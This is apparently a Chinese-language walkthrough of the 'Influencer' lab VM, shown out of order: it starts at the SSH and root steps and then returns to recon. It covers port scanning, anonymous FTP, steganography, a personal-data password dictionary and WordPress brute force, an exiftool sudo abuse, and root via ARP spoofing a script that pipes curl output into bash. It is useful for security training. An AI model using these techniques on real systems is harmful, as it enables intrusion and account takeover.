errors\nluna@influencer:\/tmp$ chmod 600 juan\nluna@influencer:\/tmp$ ssh juan@0.0.0.0 -p 1212 -i juan\nThe authenticity of host '[0.0.0.0]:1212 ([0.0.0.0]:1212)' can't be established.\nED25519 key fingerprint is SHA256:uujkDI7HQ0Bk3td\/3NfWys9FNY5cbT1zvGvXbluerAk.\nThis key is not known by any other names\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '[0.0.0.0]:1212' (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.2 LTS (GNU\/Linux 5.15.0-73-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of dom 28 abr 2024 12:25:44 UTC\n\n System load: 0.0 Processes: 128\n Usage of \/: 55.9% of 11.21GB Users logged in: 1\n Memory usage: 45% IPv4 address for enp0s3: 192.168.0.139\n Swap usage: 0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nEl mantenimiento de seguridad expandido para Applications est\u00e1 desactivado\n\nSe pueden aplicar 0 actualizaciones de forma inmediata.\n\nActive ESM Apps para recibir futuras actualizaciones de seguridad adicionales.\nVea https:\/\/ubuntu.com\/esm o ejecute \u00absudo pro status\u00bb\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\njuan@influencer:~$ <\/code><\/pre>\n\u63d0\u6743root<\/h3>\n
\u7b2c\u4e00\u6b65\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
juan@influencer:~$ sudo -l\nMatching Defaults entries for juan on influencer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser juan may run the following commands on influencer:\n (root) NOPASSWD: \/bin\/bash \/home\/juan\/check.sh\njuan@influencer:~$ cat \/home\/juan\/check.sh\n#!\/bin\/bash\n\n\/usr\/bin\/curl http:\/\/server.hmv\/98127651 | \/bin\/bash<\/code><\/pre>\n\u53c8\u662farp\u6b3a\u9a97\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u4ed6\u5c45\u7136\u81ea\u5df1\u53ef\u5199\uff0c\u800c\u4e14\u81ea\u5e26\u4e86\u89e3\u6790\uff0c\u6211\u8bf4\u548b\u4e0d\u884c\u3002\u3002\u3002\u4f46\u662f\u641e\u90fd\u641e\u4e86\uff0c\u628a\u4ed6\u81ea\u5e26\u7684\u89e3\u6790\u5220\u6389\u5c31\u884c\u4e86\u5427\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u62ff\u4e0brootshell\u4e86\uff01\uff01\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1AC411j7Zj\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ rustscan -a 192.168.0.139 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.139:80\nOpen 192.168.0.139:2121\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: OPTIONS HEAD GET POST\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n2121\/tcp open ftp syn-ack vsftpd 3.0.5\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to 192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 4\n| vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r-- 1 0 0 11113 Jun 09 2023 facebook.jpg\n| -rw-r--r-- 1 0 0 35427 Jun 09 2023 github.jpg\n| -rw-r--r-- 1 0 0 88816 Jun 09 2023 instagram.jpg\n| -rw-r--r-- 1 0 0 27159 Jun 09 2023 linkedin.jpg\n| -rw-r--r-- 1 0 0 28 Jun 08 2023 note.txt\n|_-rw-r--r-- 1 0 0 124263 Jun 09 2023 snapchat.jpg<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.139\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.139\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,jpg,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html (Status: 403) [Size: 278]\n\/index.html (Status: 200) [Size: 10671]\n\/.php (Status: 403) [Size: 278]\n\/wordpress (Status: 301) [Size: 318] [--> http:\/\/192.168.0.139\/wordpress\/]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139 | html2text\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 10671 100 10671 0 0 4249k 0 --:--:-- --:--:-- --:--:-- 5210k\n[Ubuntu Logo]\n Apache2 Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Ubuntu systems. It is based on the\nequivalent page on Debian, from which the Ubuntu Apache packaging is derived.\nIf you can read this page, it means that the Apache HTTP server installed at\nthis site is working properly. You should replace this file (located at \/var\/\nwww\/html\/index.html) before continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview\nUbuntu's Apache2 default configuration is different from the upstream default\nconfiguration, and split into several files optimized for interaction with\nUbuntu tools. The configuration system is fully documented in \/usr\/share\/doc\/\napache2\/README.Debian.gz. Refer to this for the full documentation.\nDocumentation for the web server itself can be found by accessing the manual if\nthe apache2-doc package was installed on this server.\nThe configuration layout for an Apache2 web server installation on Ubuntu\nsystems is as follows:\n\/etc\/apache2\/<\/code><\/pre>\n\u5c31\u662f\u666e\u901a\u754c\u9762\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u7684\u63a2\u7d22\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3\u670d\u52a1<\/h3>\n
\u533f\u540d\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ftp 192.168.0.139 2121 \nConnected to 192.168.0.139.\n220 (vsFTPd 3.0.5)\nName (192.168.0.139:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||16523|)\n150 Here comes the directory listing.\ndr-xr-xr-x 2 1000 65534 4096 Jun 09 2023 .\ndr-xr-xr-x 2 1000 65534 4096 Jun 09 2023 ..\n-rw-r--r-- 1 0 0 11113 Jun 09 2023 facebook.jpg\n-rw-r--r-- 1 0 0 35427 Jun 09 2023 github.jpg\n-rw-r--r-- 1 0 0 88816 Jun 09 2023 instagram.jpg\n-rw-r--r-- 1 0 0 27159 Jun 09 2023 linkedin.jpg\n-rw-r--r-- 1 0 0 28 Jun 08 2023 note.txt\n-rw-r--r-- 1 0 0 124263 Jun 09 2023 snapchat.jpg\n226 Directory send OK.\nftp> mget *.*\nmget facebook.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||26191|)\n150 Opening BINARY mode data connection for facebook.jpg (11113 bytes).\n100% |***********************************************************************************************************| 11113 634.68 KiB\/s 00:00 ETA\n226 Transfer complete.\n11113 bytes received in 00:00 (618.66 KiB\/s)\nmget github.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||15369|)\n150 Opening BINARY mode data connection for github.jpg (35427 bytes).\n100% |***********************************************************************************************************| 35427 39.28 MiB\/s 00:00 ETA\n226 Transfer complete.\n35427 bytes received in 00:00 (28.90 MiB\/s)\nmget instagram.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||56348|)\n150 Opening BINARY mode data connection for instagram.jpg (88816 bytes).\n100% |***********************************************************************************************************| 88816 2.38 MiB\/s 00:00 ETA\n226 Transfer complete.\n88816 bytes received in 00:00 (2.35 MiB\/s)\nmget linkedin.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||16758|)\n150 Opening BINARY mode data connection for linkedin.jpg (27159 bytes).\n100% |***********************************************************************************************************| 27159 1.40 MiB\/s 00:00 ETA\n226 Transfer complete.\n27159 bytes received in 00:00 (1.37 MiB\/s)\nmget note.txt [anpqy?]? \n229 Entering Extended Passive Mode (|||22962|)\n150 Opening BINARY mode data connection for note.txt (28 bytes).\n100% |***********************************************************************************************************| 28 0.94 KiB\/s 00:00 ETA\n226 Transfer complete.\n28 bytes received in 00:00 (0.92 KiB\/s)\nmget snapchat.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||8797|)\n150 Opening BINARY mode data connection for snapchat.jpg (124263 bytes).\n100% |***********************************************************************************************************| 121 KiB 2.44 MiB\/s 00:00 ETA\n226 Transfer complete.\n124263 bytes received in 00:00 (2.42 MiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u7136\u540e\u67e5\u770b\u4e00\u4e9b\u662f\u5426\u9690\u85cf\u4e86\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ls -la\ntotal 300\ndrwxr-xr-x 2 kali kali 4096 Apr 28 06:55 .\ndrwxr-xr-x 81 kali kali 4096 Apr 28 06:48 ..\n-rw-r--r-- 1 kali kali 11113 Jun 9 2023 facebook.jpg\n-rw-r--r-- 1 kali kali 35427 Jun 9 2023 github.jpg\n-rw-r--r-- 1 kali kali 88816 Jun 9 2023 instagram.jpg\n-rw-r--r-- 1 kali kali 27159 Jun 9 2023 linkedin.jpg\n-rw-r--r-- 1 kali kali 28 Jun 8 2023 note.txt\n-rw-r--r-- 1 kali kali 124263 Jun 9 2023 snapchat.jpg\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ cat note.txt \n- Change wordpress password\n\n........\ntry and try\n........\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt snapchat.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: ""\n[i] Original filename: "backup.txt".\n[i] Extracting to "snapchat.jpg.out".\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ cat snapchat.jpg.out \nPASSWORD BACKUP\n---------------\n\nu3jkeg97gf<\/code><\/pre>\n\u6240\u4ee5\u5c1d\u8bd5\u8981\u4ece\u6700\u540e\u5f00\u59cb\u5c1d\u8bd5\uff01<\/p>\n
blog\u76ee\u5f55<\/h3>\n
\u53d1\u73b0\u4e86\u4e00\u4e2awordpress<\/code>\u76ee\u5f55\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139\/wordpress\/ -s | html2text | uniq\n\nSkip_to_content\n\n***** Breaking *****\n\u00c2\u00a1Hello_world!\n****** My_new_blog! ******\n\n****** My_new_blog! ******\n\n * Home\n \u2070\n\nTest\n*** \u00c2\u00a1Hello_world! ***\nluna\n Jun_8,_2023 1_Comments\nMy name is Luna Shine, and I am thrilled to share my passion for fashion with\nall of you. Born on June 24, 1997, I have dedicated my life to\u2026\n\nSearch\n[Unknown INPUT type]Search\n***** Entradas recientes *****\n * \u00c2\u00a1Hello_world!\n***** Comentarios recientes *****\n 1. Admin on \u00c2\u00a1Hello_world!\n***** Archivos *****\n * June_2023\n***** Categor\u00c3\u00adas *****\n * Test\n\n***** You Missed *****\n>\nTest\n*** \u00c2\u00a1Hello_world! ***\n\nMy_new_blog!\nCopyright \u00a9 All rights reserved | BlogArise by Themeansar.\n\n Search for: [Unknown INPUT type] [Search]<\/code><\/pre>\n\u5f97\u5230\u7528\u6237Luna Shine<\/code>\uff0c\u751f\u65e56,24,1997<\/code>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ whatweb http:\/\/192.168.0.139\/wordpress\/ \nhttp:\/\/192.168.0.139\/wordpress\/ [200 OK] Apache[2.4.52], Bootstrap[6.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.139], JQuery[3.7.1], MetaGenerator[WordPress 6.5.2], Script[text\/javascript], Title[My new blog!], UncommonHeaders[link], WordPress[6.5.2]<\/code><\/pre>\n\u770b\u6765\u6ca1\u5dee\u4e86\uff0c\u8fdb\u884cwpscan<\/code>\u626b\u63cf\uff1a<\/p>\n\u7528\u6237\u626b\u63cf<\/h4>\nwpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u --api-token xxxxxxxx<\/code><\/pre>\n[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n | Rss Generator (Passive Detection)\n | Wp Json Api (Aggressive Detection)\n | - http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1\n | Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Login Error Messages (Aggressive Detection)<\/code><\/pre>\n\u63d2\u4ef6\u626b\u63cf<\/h4>\nwpscan --url http:\/\/192.168.0.139\/wordpress\/ -e p --api-token xxxxxxxx<\/code><\/pre>\n[+] Enumerating Most Popular Plugins (via Passive Methods)\n\n[i] No plugins Found.<\/code><\/pre>\n\u6ca1\u6709\u63d2\u4ef6\u6b38\u3002\u3002\u3002\u3002<\/p>\n
sql\u6ce8\u5165<\/h4>\n
\u5148\u6293\u4e2a\u5305\uff1a<\/p>\n
POST \/wordpress\/wp-login.php HTTP\/1.1\nHost: 192.168.0.139\nContent-Length: 117\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.139\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.139\/wordpress\/wp-login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=0epcnghs4sn67tv9sao8bni1li\nConnection: close\n\nlog=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.139%2Fwordpress%2Fwp-admin%2F&testcookie=1<\/code><\/pre>\n\u5c1d\u8bd5\u6ce8\u5165\uff0c\u4f46\u662f\uff1a<\/p>\n
[CRITICAL] all tested parameters do not appear to be injectable.<\/code><\/pre>\n\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u7ee7\u7eed\u5c1d\u8bd5<\/h4>\n
\u5c1d\u8bd5\u4e00\u4e0b\u4e4b\u524d\u627e\u5230\u7684\u5bc6\u7801u3jkeg97gf<\/code>\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5b9a\u4e49\u5b57\u5178\u7206\u7834\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i \n ___________ \n cupp.py! # Common\n \\ # User\n \\ ,__, # Passwords\n \\ (oo)____ # Profiler\n (__) )\\ \n ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]\n [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don't know all the info, just hit enter when asked! ;)\n\n> First Name: luna\n> Surname: shine\n> Nickname: \n> Birthdate (DDMMYYYY): 24061997\n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child's name: \n> Child's nickname: \n> Child's birthdate (DDMMYYYY): \n\n> Pet's name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: \n> Do you want to add special chars at the end of words? Y\/[N]: \n> Do you want to add some random numbers at the end of words? Y\/[N]:\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to luna.txt, counting 2778 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with luna.txt and shoot! Good luck!<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u -P \/home\/kali\/cupp\/luna.txt --api-token xxxxxxx\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n | Rss Generator (Passive Detection)\n | Wp Json Api (Aggressive Detection)\n | - http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1\n | Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Login Error Messages (Aggressive Detection)\n\n[+] Performing password attack on Wp Login against 1 user\/s\n[SUCCESS] - luna \/ luna_1997 \nTrying luna \/ luna_1997 Time: 00:00:38 <================================= > (2280 \/ 5058) 45.07% ETA: ??:??:??\n[!] Valid Combinations Found:\n | Username: luna, Password: luna_1997<\/code><\/pre>\n\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u5199\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u968f\u4fbf\u8f93\u5165\u4e00\u4e2a\u76ee\u5f55\uff0c\u89e6\u53d1\u53cd\u5f39shell\uff0c\u4f46\u662f\u65e0\u6cd5\u8fdb\u884c\u89e6\u53d1\uff0c\u6362\u4e00\u4e2a\u53ef\u4ee5\u8bbf\u95ee\u7684\u8fdb\u884c\u89e6\u53d1\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@influencer:\/$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@influencer:\/$ ls -la\ntotal 2097228\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 .\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 ..\nlrwxrwxrwx 1 root root 7 Feb 17 2023 bin -> usr\/bin\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 boot\ndrwxr-xr-x 20 root root 4080 Apr 28 10:49 dev\ndrwxr-xr-x 101 root root 4096 Jun 10 2023 etc\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 home\nlrwxrwxrwx 1 root root 7 Feb 17 2023 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Feb 17 2023 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Feb 17 2023 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Feb 17 2023 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Jun 8 2023 lost+found\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 media\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 mnt\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 opt\ndr-xr-xr-x 176 root root 0 Apr 28 10:49 proc\ndrwx------ 6 root root 4096 Jun 10 2023 root\ndrwxr-xr-x 32 root root 900 Apr 28 11:25 run\nlrwxrwxrwx 1 root root 8 Feb 17 2023 sbin -> usr\/sbin\ndrwxr-xr-x 6 root root 4096 Feb 17 2023 snap\ndrwxr-xr-x 3 root root 4096 Jun 8 2023 srv\n-rw------- 1 root root 2147483648 Jun 8 2023 swap.img\ndr-xr-xr-x 13 root root 0 Apr 28 10:49 sys\ndrwxrwxrwt 2 root root 4096 Apr 28 11:02 tmp\ndrwxr-xr-x 14 root root 4096 Feb 17 2023 usr\ndrwxr-xr-x 14 root root 4096 Jun 8 2023 var\n(remote) www-data@influencer:\/$ cat \/etc\/passwd | grep 'sh'\nroot:x:0:0:root:\/root:\/bin\/bash\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nluna:x:1000:1000:Luna Shine:\/home\/luna:\/bin\/bash\njuan:x:1001:1001:juan,,,:\/home\/juan:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\n(remote) www-data@influencer:\/$ cd \/home\n(remote) www-data@influencer:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 .\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 ..\ndrwx------ 2 juan juan 4096 Jun 9 2023 juan\ndrwx------ 4 luna luna 4096 Jun 9 2023 luna\n(remote) www-data@influencer:\/home$ cd juan\nbash: cd: juan: Permission denied\n(remote) www-data@influencer:\/home$ cd luna\/\nbash: cd: luna\/: Permission denied\n(remote) www-data@influencer:\/home$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/19361\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1891\/usr\/bin\/chfn\n\/snap\/core20\/1891\/usr\/bin\/chsh\n\/snap\/core20\/1891\/usr\/bin\/gpasswd\n\/snap\/core20\/1891\/usr\/bin\/mount\n\/snap\/core20\/1891\/usr\/bin\/newgrp\n\/snap\/core20\/1891\/usr\/bin\/passwd\n\/snap\/core20\/1891\/usr\/bin\/su\n\/snap\/core20\/1891\/usr\/bin\/sudo\n\/snap\/core20\/1891\/usr\/bin\/umount\n\/snap\/core20\/1891\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1891\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1822\/usr\/bin\/chfn\n\/snap\/core20\/1822\/usr\/bin\/chsh\n\/snap\/core20\/1822\/usr\/bin\/gpasswd\n\/snap\/core20\/1822\/usr\/bin\/mount\n\/snap\/core20\/1822\/usr\/bin\/newgrp\n\/snap\/core20\/1822\/usr\/bin\/passwd\n\/snap\/core20\/1822\/usr\/bin\/su\n\/snap\/core20\/1822\/usr\/bin\/sudo\n\/snap\/core20\/1822\/usr\/bin\/umount\n\/snap\/core20\/1822\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1822\/usr\/lib\/openssh\/ssh-keysign\n(remote) www-data@influencer:\/home$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/bin\/mtr-packet cap_net_raw=ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/snap\/core20\/1891\/usr\/bin\/ping cap_net_raw=ep\n\/snap\/core20\/1822\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@influencer:\/home$ ss -atlp\nState Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nLISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:* \nLISTEN 0 128 127.0.0.1:1212 0.0.0.0:* \nLISTEN 0 32 0.0.0.0:iprop 0.0.0.0:* \nLISTEN 0 80 127.0.0.1:mysql 0.0.0.0:* \nLISTEN 0 511 *:http *:* \n(remote) www-data@influencer:\/home$ nc 0.0.0.0 1212\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\n^C<\/code><\/pre>\n\u5207\u6362luna\u63d0\u6743juan<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u5207\u6362\uff0c\u770b\u770b\u5bc6\u7801\u662f\u5426\u8fdb\u884c\u4e86\u590d\u7528\uff1a<\/p>\n
luna_1997\nu3jkeg97gf<\/code><\/pre>\n<\/div><\/p>\nluna@influencer:~$ sudo -l\nMatching Defaults entries for luna on influencer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser luna may run the following commands on influencer:\n (juan) NOPASSWD: \/usr\/bin\/exiftool<\/code><\/pre>\nhttps:\/\/gtfobins.github.io\/gtfobins\/exiftool\/#sudo<\/a><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u5199juan<\/code>\u7684ssh\u79c1\u94a5<\/code>\uff1a<\/p>\n<\/div><\/p>\nluna@influencer:~$ cd \/tmp\nluna@influencer:\/tmp$ touch id_rsa\nluna@influencer:\/tmp$ sudo \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n[sudo] password for luna: \nsudo: a password is required\nluna@influencer:\/tmp$ sudo -u juan \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n======== id_rsa\nExifTool Version Number : 12.40\nFile Name : id_rsa\nDirectory : .\nFile Size : 0 bytes\nFile Modification Date\/Time : 2024:04:28 12:15:57+00:00\nFile Access Date\/Time : 2024:04:28 12:15:57+00:00\nFile Inode Change Date\/Time : 2024:04:28 12:15:57+00:00\nFile Permissions : -rw-rw-r--\nError : File is empty\nError: File not found - \/home\/juan\/.ssh\/id_rsa\n 1 image files read\n 1 files could not be read<\/code><\/pre>\n\u989d\uff0c\u4e0d\u5b58\u5728\uff0c\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u8fdb\u53bb\uff0c\u5148\u672c\u5730\u751f\u6210\u4e00\u5bf9\u5bc6\u94a5\u5bf9\u3002<\/p>\n
